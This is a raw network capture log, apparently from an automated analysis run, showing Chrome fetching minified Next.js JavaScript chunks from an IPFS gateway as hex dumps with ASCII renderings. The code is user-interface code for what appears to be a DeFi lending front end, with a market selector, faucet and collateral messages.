                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/8701.d52e3ab5e2f5c410.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreidon43grfot4tlnoe2k22heax7alfiahubllt3koun22jusvfzcqq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 7486610
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 61 65 38 31 30 30 66 35 66 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e42ae8100f5f-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 37 30 31 5d 2c 7b 36 32 37 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 36 34 38 33 36 29 3b 74 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 6f 3d 6e 28 72 28 36 34 39 33 38 29 29 2c 73 3d 72 28 38 35 38 39 33 29 2c 69 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 73 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 6d 31 39 2e 37 37 20 37 2e 32 33 2e 30 31 2d 2e 30 31 2d 33 2e 37 32 2d 33 2e 37 32 4c 31 35 20 34 2e 35 36 6c 32 2e 31 31 20 32 2e 31 31 63 2d 2e 39 34 2e 33 36 2d 31 2e 36 31 20 31 2e 32 36
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8701],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),s=r(85893),i=(0,o.default)((0,s.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 28 28 28 74 2c 72 29 3d 3e 28 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 65 2e 73 70 61 63 69 6e 67 26 26 6e 75 6c 6c 21 3d 65 2e 73 70 61 63 69 6e 67 5b 72 5d 7c 7c 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 65 2e 64 69 72 65 63 74 69 6f 6e 26 26 6e 75 6c 6c 21 3d 65 2e 64 69 72 65 63 74 69 6f 6e 5b 72 5d 29 26 26 28 74 5b 72 5d 3d 21 30 29 2c 74 29 29 2c 7b 7d 29 2c 73 3d 28 30 2c 69 2e 50 24 29 28 7b 76 61 6c 75 65 73 3a 65 2e 64 69 72 65 63 74 69 6f 6e 2c 62 61 73 65 3a 6f 7d 29 2c 63 3d 28 30 2c 69 2e 50 24 29 28 7b 76 61 6c 75 65 73 3a 65 2e 73 70 61 63 69 6e 67 2c 62 61 73 65 3a 6f 7d 29 3b 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 73 26 26 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 66 6f 72 45 61 63 68 28 28
                                                                                                                                                                                                                                                  Data Ascii: (((t,r)=>(("object"===typeof e.spacing&&null!=e.spacing[r]||"object"===typeof e.direction&&null!=e.direction[r])&&(t[r]=!0),t)),{}),s=(0,i.P$)({values:e.direction,base:o}),c=(0,i.P$)({values:e.spacing,base:o});"object"===typeof s&&Object.keys(s).forEach((
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 72 29 29 3a 63 28 4f 62 6a 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 72 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 73 78 2c 72 3d 28 30 2c 6f 2e 5a 29 28 65 2c 61 29 3b 72 65 74 75 72
                                                                                                                                                                                                                                                  Data Ascii: Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):c(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}var d=function(e){var t=e.sx,r=(0,o.Z)(e,a);retur
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 63 61 70 3a 22 72 6f 75 6e 64 22 2c 73 74 72 6f 6b 65 4c 69 6e 65 6a 6f 69 6e 3a 22 72 6f 75 6e 64 22 7d 29 2c 28 30 2c 69 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 31 36 2e 33 32 30 33 20 34 2e 33 39 37 39 33 56 32 2e 39 39 39 39 33 43 31 36 2e 33 32 30 32 20 32 2e 36 39 33 34 33 20 31 36 2e 32 34 39 37 20 32 2e 33 39 31 30 36 20 31 36 2e 31 31 34 32 20 32 2e 31 31 36 31 35 43 31 35 2e 39 37 38 37 20 31 2e 38 34 31 32 34 20 31 35 2e 37 38 31 38 20 31 2e 36 30 31 31 36 20 31 35 2e 35 33 38 37 20 31 2e 34 31 34 34 34 43 31 35 2e 32 39 35 36 20 31 2e 32 32 37 37 33 20 31 35 2e 30 31 32 39 20 31 2e 30 39 39 33 37 20 31 34 2e 37 31 32 34 20 31 2e 30 33 39 32 39 43 31 34 2e 34 31 31 38 20 30 2e 39 37 39 32 30 39 20 31 34 2e 31 30 31 35 20 30 2e 39
                                                                                                                                                                                                                                                  Data Ascii: cap:"round",strokeLinejoin:"round"}),(0,i.jsx)("path",{d:"M16.3203 4.39793V2.99993C16.3202 2.69343 16.2497 2.39106 16.1142 2.11615C15.9787 1.84124 15.7818 1.60116 15.5387 1.41444C15.2956 1.22773 15.0129 1.09937 14.7124 1.03929C14.4118 0.979209 14.1015 0.9
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 62 2e 42 2c 7b 72 65 71 75 69 72 65 73 41 70 70 72 6f 76 61 6c 3a 64 2c 62 6c 6f 63 6b 65 64 3a 6e 2c 70 72 65 70 61 72 69 6e 67 54 72 61 6e 73 61 63 74 69 6f 6e 73 3a 63 2c 68 61 6e 64 6c 65 41 63 74 69 6f 6e 3a 61 2c 61 63 74 69 6f 6e 54 65 78 74 3a 28 30 2c 79 2e 6a 73 78 29 28 73 2e 63 43 2c 7b 69 64 3a 22 46 61 75 63 65 74 20 7b 30 7d 22 2c 76 61 6c 75 65 73 3a 7b 30 3a 74 2e 73 79 6d 62 6f 6c 7d 7d 29 2c 61 63 74 69 6f 6e 49 6e 50 72 6f 67 72 65 73 73 54 65 78 74 3a 28 30 2c 79 2e 6a 73 78 29 28 73 2e 63 43 2c 7b 69 64 3a 22 50 65 6e 64 69 6e 67 2e 2e 2e 22 7d 29 2c 6d 61 69 6e 54 78 53 74 61 74 65 3a 6c 2c 69 73 57 72 6f 6e 67 4e 65 74 77 6f 72 6b 3a 72 7d 29 7d 3b 6e 7c 7c 28 6e 3d 7b 7d 29 3b 76 61 72 20 77 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b
                                                                                                                                                                                                                                                  Data Ascii: b.B,{requiresApproval:d,blocked:n,preparingTransactions:c,handleAction:a,actionText:(0,y.jsx)(s.cC,{id:"Faucet {0}",values:{0:t.symbol}}),actionInProgressText:(0,y.jsx)(s.cC,{id:"Pending..."}),mainTxState:l,isWrongNetwork:r})};n||(n={});var w=function(e){
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 6e 74 73 5b 74 5d 3a 7b 7d 3b 74 25 32 3f 6b 28 4f 62 6a 65 63 74 28 72 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 28 30 2c 6f 2e 5a 29 28 65 2c 74 2c 72 5b 74 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 72 29 29 3a 6b 28 4f 62 6a 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69
                                                                                                                                                                                                                                                  Data Ascii: nts[t]:{};t%2?k(Object(r),!0).forEach((function(t){(0,o.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):k(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescri
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 6f 53 74 72 69 6e 67 28 29 29 7d 2c 73 69 7a 65 3a 22 73 6d 61 6c 6c 22 2c 73 78 3a 7b 6d 74 3a 36 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 70 2e 6a 73 78 29 28 6e 2e 63 43 2c 7b 69 64 3a 22 43 6f 70 79 20 65 72 72 6f 72 20 74 65 78 74 22 7d 29 2c 28 30 2c 70 2e 6a 73 78 29 28 61 2e 5a 2c 7b 73 78 3a 7b 6d 6c 3a 2e 35 2c 66 6f 6e 74 53 69 7a 65 3a 22 31 32 70 78 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 70 2e 6a 73 78 29 28 73 2e 5a 2c 7b 7d 29 7d 29 5d 7d 29 5d 7d 29 2c 28 30 2c 70 2e 6a 73 78 29 28 69 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 2c 6d 74 3a 31 32 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 70 2e 6a 73 78 29 28 64 2e 5a 2c 7b 6f 6e 43 6c 69 63
                                                                                                                                                                                                                                                  Data Ascii: oString())},size:"small",sx:{mt:6},children:[(0,p.jsx)(n.cC,{id:"Copy error text"}),(0,p.jsx)(a.Z,{sx:{ml:.5,fontSize:"12px"},children:(0,p.jsx)(s.Z,{})})]})]}),(0,p.jsx)(i.Z,{sx:{display:"flex",flexDirection:"column",mt:12},children:(0,p.jsx)(d.Z,{onClic
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 73 65 41 73 73 65 74 53 79 6d 62 6f 6c 3a 57 2e 73 79 6d 62 6f 6c 3b 72 65 74 75 72 6e 28 30 2c 76 2e 6a 73 78 73 29 28 69 2e 68 76 2c 7b 61 73 73 65 74 3a 57 2c 63 68 69 6c 64 72 65 6e 3a 5b 21 45 2e 73 75 63 63 65 73 73 26 26 28 30 2c 76 2e 6a 73 78 29 28 78 2e 45 2c 7b 74 69 74 6c 65 3a 67 2c 73 79 6d 62 6f 6c 3a 68 3f 76 6f 69 64 20 30 3a 4d 7d 29 2c 4c 26 26 21 6b 26 26 28 30 2c 76 2e 6a 73 78 29 28 6d 2e 49 2c 7b 6e 65 74 77 6f 72 6b 4e 61 6d 65 3a 28 30 2c 75 2e 4d 6f 29 28 42 29 2e 6e 61 6d 65 2c 63 68 61 69 6e 49 64 3a 42 2c 65 76 65 6e 74 3a 7b 65 76 65 6e 74 4e 61 6d 65 3a 70 2e 76 68 2e 53 57 49 54 43 48 5f 4e 45 54 57 4f 52 4b 2c 65 76 65 6e 74 50 61 72 61 6d 73 3a 7b 61 73 73 65 74 3a 6a 7d 7d 7d 29 2c 62 28 7b 69 73 57 72 6f 6e 67 4e 65 74
                                                                                                                                                                                                                                                  Data Ascii: seAssetSymbol:W.symbol;return(0,v.jsxs)(i.hv,{asset:W,children:[!E.success&&(0,v.jsx)(x.E,{title:g,symbol:h?void 0:M}),L&&!k&&(0,v.jsx)(m.I,{networkName:(0,u.Mo)(B).name,chainId:B,event:{eventName:p.vh.SWITCH_NETWORK,eventParams:{asset:j}}}),b({isWrongNet
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 22 69 73 20 6e 6f 74 22 2c 22 20 75 73 65 64 20 61 73 20 63 6f 6c 6c 61 74 65 72 61 6c 22 5d 7d 29 2c 62 26 26 28 30 2c 66 2e 6a 73 78 29 28 61 2e 5a 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 66 2e 6a 73 78 29 28 6e 2e 63 43 2c 7b 69 64 3a 22 59 6f 75 20 73 77 69 74 63 68 65 64 20 74 6f 20 7b 30 7d 20 72 61 74 65 22 2c 76 61 6c 75 65 73 3a 7b 30 3a 62 3d 3d 3d 6f 2e 74 6b 2e 56 61 72 69 61 62 6c 65 3f 22 76 61 72 69 61 62 6c 65 22 3a 22 73 74 61 62 6c 65 22 7d 7d 29 7d 29 2c 79 26 26 68 26 26 28 30 2c 66 2e 6a 73 78 73 29 28 69 2e 5a 2c 7b 73 78 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 7b 62 6f 72 64 65 72 3a 22 64 61 72 6b 22 3d 3d 3d 65 2e 70 61 6c 65 74 74 65 2e 6d 6f 64 65 3f 22 31 70 78 20 73 6f 6c 69 64 20 22 2e 63 6f 6e 63 61 74 28
                                                                                                                                                                                                                                                  Data Ascii: "is not"," used as collateral"]}),b&&(0,f.jsx)(a.Z,{children:(0,f.jsx)(n.cC,{id:"You switched to {0} rate",values:{0:b===o.tk.Variable?"variable":"stable"}})}),y&&h&&(0,f.jsxs)(i.Z,{sx:function(e){return{border:"dark"===e.palette.mode?"1px solid ".concat(


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  66192.168.2.549786209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC739OUTGET /_next/static/chunks/4815-7cc90f45fe6229bd.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:45 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 11171
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreiapnlgaomw3z7lfvwsvspfnumv6qafve355tjr4eukz6gvpz4k6xa"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/4815-7cc90f45fe6229bd.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreiapnlgaomw3z7lfvwsvspfnumv6qafve355tjr4eukz6gvpz4k6xa
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-01
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028479
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 61 66 65 63 65 63 34 34 38 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e42afecec448-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 38 31 35 5d 2c 7b 32 35 35 36 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 68 75 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5a 7d 2c 67 4f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 7d 2c 74 46 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4d 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 35 39 34 39 39 29 2c 6f 3d 72 28 34 39 35 30 31 29 2c 69 3d 72 28 36 31 37 38 32 29 2c 61 3d 72 28 33 30 31 32 30 29 2c 73 3d 72 28 37 32 33 38 39 29 2c 63 3d 72 28 36 32 30 39 37 29 2c 6c 3d 72 28 36
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4815],{25563:function(e,t,r){r.d(t,{hu:function(){return Z},gO:function(){return C},tF:function(){return M}});var n=r(59499),o=r(49501),i=r(61782),a=r(30120),s=r(72389),c=r(62097),l=r(6
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 3a 6e 5b 30 5d 7d 7d 2c 43 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 73 69 7a 65 2c 72 3d 65 2e 6c 6f 67 6f 2c 6e 3d 65 2e 74 65 73 74 43 68 61 69 6e 4e 61 6d 65 2c 6f 3d 65 2e 73 78 3b 72 65 74 75 72 6e 28 30 2c 79 2e 6a 73 78 73 29 28 61 2e 5a 2c 7b 73 78 3a 77 28 7b 6d 72 3a 32 2c 77 69 64 74 68 3a 74 2c 68 65 69 67 68 74 3a 74 2c 70 6f 73 69 74 69 6f 6e 3a 22 72 65 6c 61 74 69 76 65 22 7d 2c 6f 29 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 79 2e 6a 73 78 29 28 22 69 6d 67 22 2c 7b 73 72 63 3a 72 2c 61 6c 74 3a 22 22 2c 77 69 64 74 68 3a 22 31 30 30 25 22 2c 68 65 69 67 68 74 3a 22 31 30 30 25 22 7d 29 2c 6e 26 26 28 30 2c 79 2e 6a 73 78 29 28 73 2e 5a 2c 7b 74 69 74 6c 65 3a 6e 2c 61 72 72 6f 77 3a 21 30 2c 63 68 69 6c 64 72 65 6e
                                                                                                                                                                                                                                                  Data Ascii: :n[0]}},C=function(e){var t=e.size,r=e.logo,n=e.testChainName,o=e.sx;return(0,y.jsxs)(a.Z,{sx:w({mr:2,width:t,height:t,position:"relative"},o),children:[(0,y.jsx)("img",{src:r,alt:"",width:"100%",height:"100%"}),n&&(0,y.jsx)(s.Z,{title:n,arrow:!0,children
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 74 77 6f 72 6b 3b 72 65 74 75 72 6e 28 30 2c 79 2e 6a 73 78 73 29 28 61 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 79 2e 6a 73 78 29 28 43 2c 7b 73 69 7a 65 3a 53 3f 33 32 3a 32 38 2c 6c 6f 67 6f 3a 6e 2e 6e 65 74 77 6f 72 6b 4c 6f 67 6f 50 61 74 68 2c 74 65 73 74 43 68 61 69 6e 4e 61 6d 65 3a 50 28 72 2e 6d 61 72 6b 65 74 54 69 74 6c 65 29 2e 74 65 73 74 43 68 61 69 6e 4e 61 6d 65 7d 29 2c 28 30 2c 79 2e 6a 73 78 73 29 28 61 2e 5a 2c 7b 73 78 3a 7b 6d 72 3a 31 2c 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 66 6c 65 78 2d 73 74 61 72 74 22 7d 2c 63 68 69 6c 64 72 65 6e 3a
                                                                                                                                                                                                                                                  Data Ascii: twork;return(0,y.jsxs)(a.Z,{sx:{display:"flex",alignItems:"center"},children:[(0,y.jsx)(C,{size:S?32:28,logo:n.networkLogoPath,testChainName:P(r.marketTitle).testChainName}),(0,y.jsxs)(a.Z,{sx:{mr:1,display:"inline-flex",alignItems:"flex-start"},children:
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 73 2c 65 78 63 6c 75 73 69 76 65 3a 21 30 2c 6f 6e 43 68 61 6e 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6e 75 6c 6c 21 3d 3d 74 26 26 4f 28 74 29 7d 2c 73 78 3a 7b 77 69 64 74 68 3a 22 31 30 30 25 22 2c 68 65 69 67 68 74 3a 22 33 36 70 78 22 2c 62 61 63 6b 67 72 6f 75 6e 64 3a 4d 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61 72 79 2e 6d 61 69 6e 2c 62 6f 72 64 65 72 3a 22 31 70 78 20 73 6f 6c 69 64 20 22 2e 63 6f 6e 63 61 74 28 22 64 61 72 6b 22 3d 3d 3d 4d 2e 70 61 6c 65 74 74 65 2e 6d 6f 64 65 3f 22 72 67 62 61 28 32 33 35 2c 20 32 33 35 2c 20 32 33 37 2c 20 30 2e 31 32 29 22 3a 22 23 31 42 32 30 33 30 22 29 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 36 70 78 22 2c 6d 61 72 67 69 6e 54 6f 70 3a 22 31 36 70 78 22 2c 6d 61 72 67 69 6e 42 6f 74 74
                                                                                                                                                                                                                                                  Data Ascii: s,exclusive:!0,onChange:function(e,t){null!==t&&O(t)},sx:{width:"100%",height:"36px",background:M.palette.primary.main,border:"1px solid ".concat("dark"===M.palette.mode?"rgba(235, 235, 237, 0.12)":"#1B2030"),borderRadius:"6px",marginTop:"16px",marginBott
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 2c 79 2e 6a 73 78 29 28 6f 2e 63 43 2c 7b 69 64 3a 22 56 65 72 73 69 6f 6e 20 32 22 7d 29 7d 29 7d 29 5d 7d 29 7d 29 2c 6a 2e 7a 32 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 5a 28 65 29 2c 72 3d 74 2e 6d 61 72 6b 65 74 2c 6e 3d 74 2e 6e 65 74 77 6f 72 6b 2c 6f 3d 50 28 72 2e 6d 61 72 6b 65 74 54 69 74 6c 65 29 3b 72 65 74 75 72 6e 28 30 2c 79 2e 6a 73 78 73 29 28 78 2e 5a 2c 7b 22 64 61 74 61 2d 63 79 22 3a 22 6d 61 72 6b 65 74 53 65 6c 65 63 74 6f 72 5f 22 2e 63 6f 6e 63 61 74 28 65 29 2c 76 61 6c 75 65 3a 65 2c 73 78 3a 7b 22 2e 4d 75 69 4c 69 73 74 49 74 65 6d 49 63 6f 6e 2d 72 6f 6f 74 22 3a 7b 6d 69 6e 57 69 64 74 68 3a 22 75 6e 73 65 74 22 7d 2c 64 69 73 70 6c 61 79 3a 72 2e 76 33 26 26 73 3d 3d 3d 46 2e 56 32 7c 7c 21
                                                                                                                                                                                                                                                  Data Ascii: ,y.jsx)(o.cC,{id:"Version 2"})})})]})}),j.z2.map((function(e){var t=Z(e),r=t.market,n=t.network,o=P(r.marketTitle);return(0,y.jsxs)(x.Z,{"data-cy":"marketSelector_".concat(e),value:e,sx:{".MuiListItemIcon-root":{minWidth:"unset"},display:r.v3&&s===F.V2||!
